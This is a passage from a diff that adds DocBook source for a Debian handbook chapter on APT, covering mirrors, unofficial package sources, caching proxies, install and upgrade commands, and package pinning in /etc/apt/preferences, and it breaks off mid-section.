+				Picky users who are not satisfied with the performance of <literal>deb.debian.org</literal> can try to find a better mirror in the official mirror list: <ulink type="block" url="https://www.debian.org/mirror/list" />
+			</para>
+			 <para>
+				But when you don't know which mirror is best for you, this list is of not much use. Fortunately for you, Debian maintains DNS entries of the form <literal>ftp.<replaceable>country-code</replaceable>.debian.org</literal> (e.g. <literal>ftp.us.debian.org</literal> for the USA, <literal>ftp.fr.debian.org</literal> for France, etc.) which are covering many countries and which are pointing to one (or more) of the best mirrors available within that country.
+			</para>
+			 <indexterm>
+				<primary><literal>httpredir.debian.org</literal></primary>
+			</indexterm>
+			 <para>
+				As an alternative to <literal>deb.debian.org</literal>, there used to be <literal>httpredir.debian.org</literal>. This service would identify a mirror close to you (among the list of official mirrors, using GeoIP mainly) and would redirect APT's requests to that mirror. This service has been deprecated due to reliability concerns and now <literal>httpredir.debian.org</literal> provides the same CDN-based service as <literal>deb.debian.org</literal>.
+			</para>
+
+		</section>
+		 <section>
+			<title>Non-Official Resources: <literal>mentors.debian.net</literal></title>
+			 <indexterm>
+				<primary><literal>mentors.debian.net</literal></primary>
+			</indexterm>
+			 <para>
+				There are numerous non-official sources of Debian packages set up by advanced users who have recompiled some software (Ubuntu made this popular with their Personal Package Archive service), by programmers who make their creation available to all, and even by Debian developers who offer pre-versions of their package online.
+			</para>
+			 <para>
+				The <literal>mentors.debian.net</literal> site is interesting (although it only provides source packages), since it gathers packages created by candidates to the status of official Debian developer or by volunteers who wish to create Debian packages without going through that process of integration. These packages are made available without any guarantee regarding their quality; make sure that you check their origin and integrity and then test them before you consider using them in production.
+			</para>
+			 <sidebar> <title><emphasis>COMMUNITY</emphasis> The <literal>debian.net</literal> sites</title>
+			 <indexterm>
+				<primary><emphasis>debian.net</emphasis></primary>
+			</indexterm>
+			 <para>
+				The <emphasis>debian.net</emphasis> domain is not an official resource of the Debian project. Each Debian developer may use that domain name for their own use. These websites can contain unofficial services (sometimes personal sites) hosted on a machine which does not belong to the project and set up by Debian developers, or even prototypes about to be moved on to <emphasis>debian.org</emphasis>. Two reasons can explain why some of these prototypes remain on <emphasis>debian.net</emphasis>: either no one has made the necessary effort to transform it into an official service (hosted on the <emphasis>debian.org</emphasis> domain, and with a certain guarantee of maintenance), or the service is too controversial to be officialized.
+			</para>
+			 </sidebar> <para>
+				Installing a package means giving root rights to its creator, because they decide on the contents of the initialization scripts which are run under that identity. Official Debian packages are created by volunteers who have been co-opted and reviewed and who can seal their packages so that their origin and integrity can be checked.
+			</para>
+			 <para>
+				In general, be wary of a package whose origin you don't know and which isn't hosted on one of the official Debian servers: evaluate the degree to which you can trust the creator, and check the integrity of the package. <ulink type="block" url="http://mentors.debian.net/" />
+			</para>
+			 <sidebar id="sidebar.snapshot.debian.org"> <title><emphasis>GOING FURTHER</emphasis> Old package versions: <literal>snapshot.debian.org</literal></title>
+			 <indexterm>
+				<primary><literal>snapshot.debian.org</literal></primary>
+			</indexterm>
+			 <para>
+				The <literal>snapshot.debian.org</literal> service, introduced in April 2010, can be used to “go backwards in time” and to find an old version of a package. It can be used for example to identify which version of a package introduced a regression, and more concretely, to come back to the former version while waiting for the regression fix.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Caching Proxy for Debian Packages</title>
+			 <indexterm>
+				<primary>proxy cache</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>cache, proxy</primary>
+			</indexterm>
+			 <para>
+				When an entire network of machines is configured to use the same remote server to download the same updated packages, any administrator knows that it would be beneficial to have an intermediate proxy acting as a network-local cache (see sidebar <xref linkend="sidebar.cache" />).
+			</para>
+			 <para>
+				You can configure APT to use a "standard" proxy (see <xref linkend="sect.apt-config" /> for the APT side, and <xref linkend="sect.http-ftp-proxy" /> for the proxy side), but the Debian ecosystem offers better options to solve this problem. The dedicated software presented in this section are smarter than a plain proxy cache because they can rely on the specific structure of APT repositories (for instance they know when individual files are obsolete or not, and thus adjust the time during which they are kept).
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">apt-cacher</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">apt-cacher-ng</emphasis></primary>
+			</indexterm>
+			 <para>
+				<emphasis role="pkg">apt-cacher</emphasis> and <emphasis role="pkg">apt-cacher-ng</emphasis> work like usual proxy cache servers. APT's <filename>sources.list</filename> is left unchanged, but APT is configured to use them as proxy for outgoing requests.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">approx</emphasis></primary>
+			</indexterm>
+			 <para>
+				<emphasis role="pkg">approx</emphasis>, on the other hand, acts like an HTTP server that “mirrors” any number of remote repositories in its top-level URLs. The mapping between those top-level directories and the remote URLs of the repositories is stored in <filename>/etc/approx/approx.conf</filename>:
+			</para>
+			 
+<programlisting>
+# &lt;name&gt; &lt;repository-base-url&gt;
+debian   http://deb.debian.org/debian
+security http://security.debian.org
+</programlisting>
+			 <para>
+				<emphasis role="pkg">approx</emphasis> runs by default on port 9999 via a systemd socket and requires the users to adjust their <filename>sources.list</filename> file to point to the approx server:
+			</para>
+			 
+<programlisting># Sample sources.list pointing to a local approx server
+deb http://apt.falcot.com:9999/security stretch/updates main contrib non-free
+deb http://apt.falcot.com:9999/debian stretch main contrib non-free
+</programlisting>
+
+		</section>
+
+	</section>
+	 <section id="sect.apt-get">
+		<title><command>aptitude</command>, <command>apt-get</command>, and <command>apt</command> Commands</title>
+		 <indexterm>
+			<primary><command>apt</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>apt-get</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>aptitude</command></primary>
+		</indexterm>
+		 <para>
+			APT is a vast project, whose original plans included a graphical interface. It is based on a library which contains the core application, and <command>apt-get</command> is the first front end — command-line based — which was developed within the project. <command>apt</command> is a second command-line based front end provided by APT which overcomes some design mistakes of <command>apt-get</command>.
+		</para>
+		 <para>
+			Both tools are built on top of the same library and are thus very close but the default behaviour of <command>apt</command> has been improved for interactive use and to actually do what most users expect. APT's developers reserve the right to change the public interface of this tool to further improve it. On the opposite, the public interface of <command>apt-get</command> is well defined and will not change in any backwards incompatible way. It is thus the tool that you want to use when you need to script package installation requests.
+		</para>
+		 <para>
+			Numerous other graphical interfaces then appeared as external projects: <command>synaptic</command>, <command>aptitude</command> (which includes both a text mode interface and a graphical one — even if not complete yet), <command>wajig</command>, etc. The most recommended interface, <command>apt</command>, is the one that we will use in the examples given in this section. Note however that <command>apt-get</command> and <command>aptitude</command> have a very similar command line syntax. When there are major differences between <command>apt</command>, <command>apt-get</command> and <command>aptitude</command>, these differences will be detailed.
+		</para>
+		 <section>
+			<title>Initialization</title>
+			 <para>
+				For any work with APT, the list of available packages needs to be updated; this can be done simply through <command>apt update</command>. Depending on the speed of your connection, the operation can take a while since it involves downloading a certain number of <filename>Packages</filename>/<filename>Sources</filename>/<filename>Translation-<replaceable>language-code</replaceable></filename> files, which have gradually become bigger and bigger as Debian has developed (at least 10 MB of data for the <literal>main</literal> section). Of course, installing from a CD-ROM set does not require any downloading — in this case, the operation is very fast.
+			</para>
+			 <indexterm>
+				<primary><command>apt update</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-get update</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude update</command></primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>Installing and Removing</title>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>installation</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>removal</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>installation</primary>
+				<secondary>package installation</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>removal of a package</primary>
+			</indexterm>
+			 <para>
+				With APT, packages can be added or removed from the system, respectively with <command>apt install <replaceable>package</replaceable></command> and <command>apt remove <replaceable>package</replaceable></command>. In both cases, APT will automatically install the necessary dependencies or delete the packages which depend on the package that is being removed. The <command>apt purge <replaceable>package</replaceable></command> command involves a complete uninstallation — the configuration files are also deleted.
+			</para>
+			 <indexterm>
+				<primary><command>apt install</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt remove</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt purge</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-get install</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-get remove</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-get purge</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude install</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude remove</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude purge</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>TIP</emphasis> Installing the same selection of packages several times</title>
+			 <para>
+				It can be useful to systematically install the same list of packages on several computers. This can be done quite easily.
+			</para>
+			 <para>
+				First, retrieve the list of packages installed on the computer which will serve as the “model” to copy.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>dpkg --get-selections &gt;pkg-list</userinput></screen>
+			 <para>
+				The <filename>pkg-list</filename> file then contains the list of installed packages. Next, transfer the <filename>pkg-list</filename> file onto the computers you want to update and use the following commands:
+			</para>
+			 
+<screen>## Update dpkg's database of known packages
+# <userinput>avail=`mktemp`</userinput>
+# <userinput>apt-cache dumpavail &gt; "$avail"</userinput>
+# <userinput>dpkg --merge-avail "$avail"</userinput>
+# <userinput>rm -f "$avail"</userinput>
+## Update dpkg's selections
+# <userinput>dpkg --set-selections &lt; pkg-list</userinput>
+## Ask apt-get to install the selected packages
+# <userinput>apt-get dselect-upgrade</userinput></screen>
+			 <para>
+				The first commands records the list of available packages in the dpkg database, then <command>dpkg --set-selections</command> restores the selection of packages that you wish to install, and the <command>apt-get</command> invocation executes the required operations! <command>aptitude</command> does not have this command.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> Removing and installing at the same time</title>
+			 <para>
+				It is possible to ask <command>apt</command> (or <command>apt-get</command>, or <command>aptitude</command>) to install certain packages and remove others on the same command line by adding a suffix. With an <command>apt install</command> command, add “<literal>-</literal>” to the names of the packages you wish to remove. With an <command>apt remove</command> command, add “<literal>+</literal>” to the names of the packages you wish to install.
+			</para>
+			 <para>
+				The next example shows two different ways to install <replaceable>package1</replaceable> and to remove <replaceable>package2</replaceable>.
+			</para>
+			 
+<screen># <userinput>apt install <replaceable>package1</replaceable> <replaceable>package2-</replaceable></userinput>
+[...]
+# <userinput>apt remove <replaceable>package1+</replaceable> <replaceable>package2</replaceable></userinput>
+[...]
+</screen>
+			 <para>
+				This can also be used to exclude packages which would otherwise be installed, for example due to a <literal>Recommends</literal>. In general, the dependency solver will use that information as a hint to look for alternative solutions.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> <command>apt --reinstall</command> and <command>aptitude reinstall</command></title>
+			 <indexterm>
+				<primary>reinstallation</primary>
+			</indexterm>
+			 <para>
+				The system can sometimes be damaged after the removal or modification of files in a package. The easiest way to retrieve these files is to reinstall the affected package. Unfortunately, the packaging system finds that the latter is already installed and politely refuses to reinstall it; to avoid this, use the <literal>--reinstall</literal> option of the <command>apt</command> and <command>apt-get</command> commands. The following command reinstalls <emphasis role="pkg">postfix</emphasis> even if it is already present:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>apt --reinstall install postfix</userinput></screen>
+			 <para>
+				The <command>aptitude</command> command line is slightly different, but achieves the same result with <command>aptitude reinstall postfix</command>.
+			</para>
+			 <para>
+				The problem does not arise with <command>dpkg</command>, but the administrator rarely uses it directly.
+			</para>
+			 <para>
+				Be careful! Using <command>apt --reinstall</command> to restore packages modified during an attack will certainly not recover the system as it was. <xref linkend="sect.dealing-with-compromised-machine" /> details the necessary steps to take with a compromised system.
+			</para>
+			 </sidebar> <para>
+				If the file <filename>sources.list</filename> mentions several distributions, it is possible to give the version of the package to install. A specific version number can be requested with <command>apt install <replaceable>package</replaceable>=<replaceable>version</replaceable></command>, but indicating its distribution of origin (<emphasis role="distribution">Stable</emphasis>, <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis>) — with <command>apt install <replaceable>package</replaceable>/<replaceable>distribution</replaceable></command> — is usually preferred. With this command, it is possible to go back to an older version of a package (if for instance you know that it works well), provided that it is still available in one of the sources referenced by the <filename>sources.list</filename> file. Otherwise the <literal>snapshot.debian.org</literal> archive can come to the rescue (see sidebar <xref linkend="sidebar.snapshot.debian.org" />).
+			</para>
+			 <example>
+				<title>Installation of the <emphasis role="distribution">unstable</emphasis> version of <emphasis role="pkg">spamassassin</emphasis></title>
+				 
+<screen><computeroutput># </computeroutput><userinput>apt install spamassassin/unstable</userinput></screen>
+
+			</example>
+			 <para>
+				If the package to install has been made available to you under the form of a simple <filename>.deb</filename> file without any associated package repository, it is still possible to use APT to install it together with its dependencies (provided that the dependencies are available in the configured repositories) with a simple command: <command>apt install ./<replaceable>path-to-the-package.deb</replaceable></command>. The leading <literal>./</literal> is important to make it clear that we are referring to a filename and not to the name of a package available in one of the repositories.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> The cache of <filename>.deb</filename> files</title>
+			 <para>
+				APT keeps a copy of each downloaded <filename>.deb</filename> file in the directory <filename>/var/cache/apt/archives/</filename>. In case of frequent updates, this directory can quickly take a lot of disk space with several versions of each package; you should regularly sort through them. Two commands can be used: <command>apt-get clean</command> entirely empties the directory; <command>apt-get autoclean</command> only removes packages which can no longer be downloaded (because they have disappeared from the Debian mirror) and are therefore clearly useless (the configuration parameter <literal>APT::Clean-Installed</literal> can prevent the removal of <filename>.deb</filename> files that are currently installed).
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.apt-upgrade">
+			<title>System Upgrade</title>
+			 <indexterm>
+				<primary>upgrade</primary>
+				<secondary>system upgrade</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt upgrade</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-get upgrade</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude safe-upgrade</command></primary>
+			</indexterm>
+			 <para>
+				Regular upgrades are recommended, because they include the latest security updates. To upgrade, use <command>apt upgrade</command>, <command>apt-get upgrade</command> or <command>aptitude safe-upgrade</command> (of course after <command>apt update</command>). This command looks for installed packages which can be upgraded without removing any packages. In other words, the goal is to ensure the least intrusive upgrade possible. <command>apt-get</command> is slightly more demanding than <command>aptitude</command> or <command>apt</command> because it will refuse to install packages which were not installed beforehand.
+			</para>
+			 <sidebar id="sidebar.apt-pdiff"> <title><emphasis>TIP</emphasis> Incremental upgrade</title>
+			 <para>
+				As we explained earlier, the aim of the <command>apt update</command> command is to download for each package source the corresponding <filename>Packages</filename> (or <filename>Sources</filename>) file. However, even after a <command>xz</command> compression, these files can remain rather large (the <filename>Packages.xz</filename> for the <foreignphrase>main</foreignphrase> section of <emphasis role="distribution">Stretch</emphasis> takes more than 6 MB). If you wish to upgrade regularly, these downloads can take up a lot of time.
+			</para>
+			 <para>
+				To speed up the process APT can download “diff” files containing the changes since the previous update, as opposed to the entire file. To achieve this, official Debian mirrors distribute different files which list the differences between one version of the <filename>Packages</filename> file and the following version. They are generated at each update of the archives and a history of one week is kept. Each of these “diff” files only takes a few dozen kilobytes for <emphasis role="distribution">Unstable</emphasis>, so that the amount of data downloaded by a weekly <command>apt update</command> is often divided by 10. For distributions like <emphasis role="distribution">Stable</emphasis> and <emphasis role="distribution">Testing</emphasis>, which change less, the gain is even more noticeable.
+			</para>
+			 <para>
+				However, it can sometimes be of interest to force the download of the entire <filename>Packages</filename> file, especially when the last upgrade is very old and when the mechanism of incremental differences would not contribute much. This can also be interesting when network access is very fast but when the processor of the machine to upgrade is rather slow, since the time saved on the download is more than lost when the computer calculates the new versions of these files (starting with the older versions and applying the downloaded differences). To do that, you can use the configuration parameter <literal>Acquire::Pdiffs</literal> and set it to <literal>false</literal>.
+			</para>
+			 </sidebar> <para>
+				<command>apt</command> will generally select the most recent version number (except for packages from <emphasis role="distribution">Experimental</emphasis> and <emphasis role="distribution">stable-backports</emphasis>, which are ignored by default whatever their version number). If you specified <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis> in your <filename>sources.list</filename>, <command>apt upgrade</command> will switch most of your <emphasis role="distribution">Stable</emphasis> system to <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis>, which might not be what you intended.
+			</para>
+			 <para>
+				To tell <command>apt</command> to use a specific distribution when searching for upgraded packages, you need to use the <literal>-t</literal> or <literal>--target-release</literal> option, followed by the name of the distribution you want (for example: <command>apt -t stable upgrade</command>). To avoid specifying this option every time you use <command>apt</command>, you can add <literal>APT::Default-Release "stable";</literal> in the file <filename>/etc/apt/apt.conf.d/local</filename>.
+			</para>
+			 <indexterm>
+				<primary><command>apt full-upgrade</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt dist-upgrade</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-get dist-upgrade</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude dist-upgrade</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude full-upgrade</command></primary>
+			</indexterm>
+			 <para>
+				For more important upgrades, such as the change from one major Debian version to the next, you need to use <command>apt full-upgrade</command>. With this instruction, <command>apt</command> will complete the upgrade even if it has to remove some obsolete packages or install new dependencies. This is also the command used by users who work daily with the Debian <emphasis role="distribution">Unstable</emphasis> release and follow its evolution day by day. It is so simple that it hardly needs explanation: APT's reputation is based on this great functionality.
+			</para>
+			 <para>
+				Unlike <command>apt</command> and <command>aptitude</command>, <command>apt-get</command> doesn't know the <command>full-upgrade</command> command. Instead, you should use <command>apt-get dist-upgrade</command> (”distribution upgrade”), the historical and well-known command that <command>apt</command> and <command>aptitude</command> also accept for the convenience of users who got used to it.
+			</para>
+
+		</section>
+		 <section id="sect.apt-config">
+			<title>Configuration Options</title>
+			 <indexterm>
+				<primary>APT</primary>
+				<secondary>configuration</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>apt.conf.d/</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/apt/apt.conf.d/</filename></primary>
+			</indexterm>
+			 <para>
+				Besides the configuration elements already mentioned, it is possible to configure certain aspects of APT by adding directives in a file of the <filename>/etc/apt/apt.conf.d/</filename> directory. Remember for instance that it is possible for APT to tell <command>dpkg</command> to ignore file conflict errors by specifying <literal>DPkg::options { "--force-overwrite"; }</literal>.
+			</para>
+			 <para>
+				If the Web can only be accessed through a proxy, add a line like <literal>Acquire::http::proxy "http://<replaceable>yourproxy</replaceable>:3128"</literal>. For an FTP proxy, write <literal>Acquire::ftp::proxy "ftp://<replaceable>yourproxy</replaceable>"</literal>. To discover more configuration options, read the <citerefentry><refentrytitle>apt.conf</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> manual page with the <command>man apt.conf</command> command (for details on manual pages, see <xref linkend="sect.manual-pages" />).
+			</para>
+			 <sidebar id="sidebar.directory.d"> <title><emphasis>BACK TO BASICS</emphasis> Directories ending in <filename>.d</filename></title>
+			 <indexterm>
+				<primary><filename>.d</filename></primary>
+			</indexterm>
+			 <para>
+				Directories with a <filename>.d</filename> suffix are used more and more often. Each directory represents a configuration file which is split over multiple files. In this sense, all of the files in <filename>/etc/apt/apt.conf.d/</filename> are instructions for the configuration of APT. APT includes them in alphabetical order, so that the last ones can modify a configuration element defined in one of the first ones.
+			</para>
+			 <para>
+				This structure brings some flexibility to the machine administrator and to the package maintainers. Indeed, the administrator can easily modify the configuration of the software by adding a ready-made file in the directory in question without having to change an existing file. Package maintainers use the same approach when they need to adapt the configuration of another software to ensure that it perfectly co-exists with theirs. The Debian policy explicitly forbids modifying configuration files of other packages — only users are allowed to do this. Remember that during a package upgrade, the user gets to choose the version of the configuration file that should be kept when a modification has been detected. Any external modification of the file would trigger that request, which would disturb the administrator, who is sure not to have changed anything.
+			</para>
+			 <para>
+				Without a <filename>.d</filename> directory, it is impossible for an external package to change the settings of a program without modifying its configuration file. Instead it must invite the user to do it themselves and lists the operations to be done in the file <filename>/usr/share/doc/<replaceable>package</replaceable>/README.Debian</filename>.
+			</para>
+			 <para>
+				Depending on the application, the <filename>.d</filename> directory is used directly or managed by an external script which will concatenate all the files to create the configuration file itself. It is important to execute the script after any change in that directory so that the most recent modifications are taken into account. In the same way, it is important not to work directly in the configuration file created automatically, since everything would be lost at the next execution of the script. The chosen method (<filename>.d</filename> directory used directly or a file generated from that directory) is usually dictated by implementation constraints, but in both cases the gains in terms of configuration flexibility more than make up for the small complications that they entail. The Exim 4 mail server is an example of the generated file method: it can be configured through several files (<filename>/etc/exim4/conf.d/*</filename>) which are concatenated into <filename>/var/lib/exim4/config.autogenerated</filename> by the <command>update-exim4.conf</command> command.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.apt.priorities">
+			<title>Managing Package Priorities</title>
+			 <para>
+				One of the most important aspects in the configuration of APT is the management of the priorities associated with each package source. For instance, you might want to extend one distribution with one or two newer packages from <emphasis role="distribution">Testing</emphasis>, <emphasis role="distribution">Unstable</emphasis> or <emphasis role="distribution">Experimental</emphasis>. It is possible to assign a priority to each available package (the same package can have several priorities depending on its version or the distribution providing it). These priorities will influence APT's behavior: for each package, it will always select the version with the highest priority (except if this version is older than the installed one and if its priority is less than 1000).
+			</para>
+			 <indexterm>
+				<primary>APT</primary>
+				<secondary><foreignphrase>pinning</foreignphrase></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>pinning, APT pinning</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>priority</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>priority</primary>
+				<secondary>package priority</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>APT</primary>
+				<secondary>preferences</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>preferences</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/apt/preferences</filename></primary>
+			</indexterm>
+			 <para>
+				APT defines several default priorities. Each installed package version has a priority of 100. A non-installed version has a priority of 500 by default, but it can jump to 990 if it is part of the target release (defined with the <literal>-t</literal> command-line option or the <literal>APT::Default-Release</literal> configuration directive).
+			</para>
+			 <para>
+				You can modify the priorities by adding entries in the <filename>/etc/apt/preferences</filename> file with the names of the affected packages, their version, their origin and their new priority.
+			</para>
+			 <para>
+				APT will never install an older version of a package (that is, a package whose version number is lower than the one of the currently installed package) except if its priority is higher than 1000. APT will always install the highest priority package which follows this constraint. If two packages have the same priority, APT installs the newest one (whose version number is the highest). If two packages of same version have the same priority but differ in their content, APT installs the version that is not installed (this rule has been created to cover the case of a package update without the increment of the revision number, which is usually required).
+			</para>
+			 <para>
+				In more concrete terms, a package whose priority is less than 0 will never be installed. A package with a priority ranging between 0 and 100 will only be installed if no other version of the package is already installed. With a priority between 100 and 500, the package will only be installed if there is no other newer version installed or available in another distribution. A package of priority between 501 and 990 will only be installed if there is no newer version installed or available in the target distribution. With a priority between 990 and 1000, the package will be installed except if the installed version is newer. A priority greater than 1000 will always lead to the installation of the package even if it forces APT to downgrade to an older version.
+			</para>
+			 <para>
+				When APT checks <filename>/etc/apt/preferences</filename>, it first takes into account the most specific entries (often those specifying the concerned package), then the more generic ones (including for example all the packages of a distribution). If several generic entries exist, the first match is used. The available selection criteria include the package's name and the source providing it. Every package source is identified by the information contained in a <filename>Release</filename> file that APT downloads together with the <filename>Packages</filename> files. It specifies the origin (usually “Debian” for the packages of official mirrors, but it can also be a person's or an organization's name for third-party repositories). It also gives the name of the distribution (usually <emphasis role="distribution">Stable</emphasis>, <emphasis role="distribution">Testing</emphasis>, <emphasis role="distribution">Unstable</emphasis> or <emphasis role="distribution">Experimental</emphasis> for the standard distributions provided by Debian) together with its version (for example 9 for Debian <emphasis role="distribution">Stretch</emphasis>). Let's have a look at its syntax through some realistic case studies of this mechanism.
+			</para>
+			 <sidebar> <title><emphasis>SPECIFIC CASE</emphasis> Priority of <emphasis role="distribution">experimental</emphasis></title>
+			 <indexterm>
+				<primary><emphasis role="distribution">Experimental</emphasis></primary>
+			</indexterm>
+			 <para>
+				If you listed <emphasis role="distribution">Experimental</emphasis> in your <filename>sources.list</filename> file, the corresponding packages will almost never be installed because their default APT priority is 1. This is of course a specific case, designed to keep users from installing <emphasis role="distribution">Experimental</emphasis> packages by mistake. The packages can only be installed by typing <command>aptitude install <replaceable>package</replaceable>/experimental</command> — users typing this command can only be aware of the risks that they take. It is still possible (though <emphasis>not</emphasis> recommended) to treat packages of <emphasis role="distribution">Experimental</emphasis> like those of other distributions by giving them a priority of 500. This is done with a specific entry in <filename>/etc/apt/preferences</filename>:
+			</para>
+			 <informalexample> 
+<programlisting>Package: *
+Pin: release a=experimental
+Pin-Priority: 500
+</programlisting>
+			 </informalexample> </sidebar> <para>
+				Let's suppose that you only want to use packages from the stable version of Debian. Those provided in other versions should not be installed except if explicitly requested. You could write the following entries in the <filename>/etc/apt/preferences</filename> file:
+			</para>
+			 <informalexample> 
+<programlisting>Package: *
+Pin: release a=stable
+Pin-Priority: 900
+
+Package: *
+Pin: release o=Debian
+Pin-Priority: -10
+</programlisting>
+			 </informalexample> <para>
+				<literal>a=stable</literal> defines the name of the selected distribution. <literal>o=Debian</literal> limits the scope to packages whose origin is “Debian”.
+			</para>
+			 <para>
+				Let's now assume that you have a server with several local programs depending on the version 5.24 of Perl and that you want to ensure that upgrades will not install another version of it. You could use this entry:
+			</para>
+			 <informalexample> 
+<programlisting>Package: perl
+Pin: version 5.24*
+Pin-Priority: 1001
+</programlisting>
+			 </informalexample> <para>
+				The reference documentation for this configuration file is available in the manual page <citerefentry><refentrytitle>apt_preferences</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry>, which you can display with <command>man apt_preferences</command>.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> Comments in <filename>/etc/apt/preferences</filename></title>
+			 <indexterm>
+				<primary><literal>Explanation</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>Pin</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>Pin-Priority</literal></primary>
+			</indexterm>
+			 <para>
+				There is no official syntax to put comments in the <filename>/etc/apt/preferences</filename> file, but some textual descriptions can be provided by putting one or more “<literal>Explanation</literal>” fields at the start of each entry:
+			</para>
+			 <informalexample> 
+<programlisting>Explanation: The package xserver-xorg-video-intel provided
+Explanation: in experimental can be used safely
+Package: xserver-xorg-video-intel
+Pin: release a=experimental
+Pin-Priority: 500
+</programlisting>
+			 </informalexample> </sidebar>
+		</section>
+		 <section id="sect.apt-mix-distros">
+			<title>Working with Several Distributions</title>
+			 <para>
+				<command>apt</command> being such a marvelous tool, it is tempting to pick packages coming from other distributions. For example, after having installed a <emphasis role="distribution">Stable</emphasis> system, you might want to try out a software package available in <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis> without diverging too much from the system's initial state.
+			</para>
+			 <para>
+				Even if you will occasionally encounter problems while mixing packages from different distributions, <command>apt</command> manages such coexistence very well and limits risks very effectively. The best way to proceed is to list all distributions used in <filename>/etc/apt/sources.list</filename> (some people always put the three distributions, but remember that <emphasis role="distribution">Unstable</emphasis> is reserved for experienced users) and to define your reference distribution with the <literal>APT::Default-Release</literal> parameter (see <xref linkend="sect.apt-upgrade" />).
+			</para>
+			 <para>
+				Let's suppose that <emphasis role="distribution">Stable</emphasis> is your reference distribution but that <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis> are also listed in your <filename>sources.list</filename> file. In this case, you can use <command>apt install <replaceable>package</replaceable>/testing</command> to install a package from <emphasis role="distribution">Testing</emphasis>. If the installation fails due to some unsatisfiable dependencies, let it solve those dependencies within <emphasis role="distribution">Testing</emphasis> by adding the <literal>-t testing</literal> parameter. The same obviously applies to <emphasis role="distribution">Unstable</emphasis>.
+			</para>
+			 <para>
+				In this situation, upgrades (<command>upgrade</command> and <command>full-upgrade</command>) are done within <emphasis role="distribution">Stable</emphasis> except for packages already upgraded to another distribution: those will follow updates available in the other distributions. We will explain this behavior with the help of the default priorities set by APT below. Do not hesitate to use <command>apt-cache policy</command> (see sidebar <xref linkend="sidebar.apt-cache-policy" />) to verify the given priorities.
+			</para>
+			 <para>
+				Everything centers around the fact that APT only considers packages of higher or equal version than the installed one (assuming that <filename>/etc/apt/preferences</filename> has not been used to force priorities higher than 1000 for some packages).
+			</para>
+			 <sidebar id="sidebar.apt-cache-policy"> <title><emphasis>TIP</emphasis> <command>apt-cache policy</command></title>
+			 <para>
+				To gain a better understanding of the mechanism of priority, do not hesitate to execute <command>apt-cache policy</command> to display the default priority associated with each package source. You can also use <command>apt-cache policy <replaceable>package</replaceable></command> to display the priorities of all available versions of a given package.
+			</para>
+			 </sidebar> <para>
+				Let's assume that you have installed version 1 of a first package from <emphasis role="distribution">Stable</emphasis> and that version 2 and 3 are available respectively in <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis>. The installed version has a priority of 100 but the version available in <emphasis role="distribution">Stable</emphasis> (the very same) has a priority of 990 (because it is part of the target release). Packages in <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis> have a priority of 500 (the default priority of a non-installed version). The winner is thus version 1 with a priority of 990. The package “stays in <emphasis role="distribution">Stable</emphasis>”.
+			</para>
+			 <para>
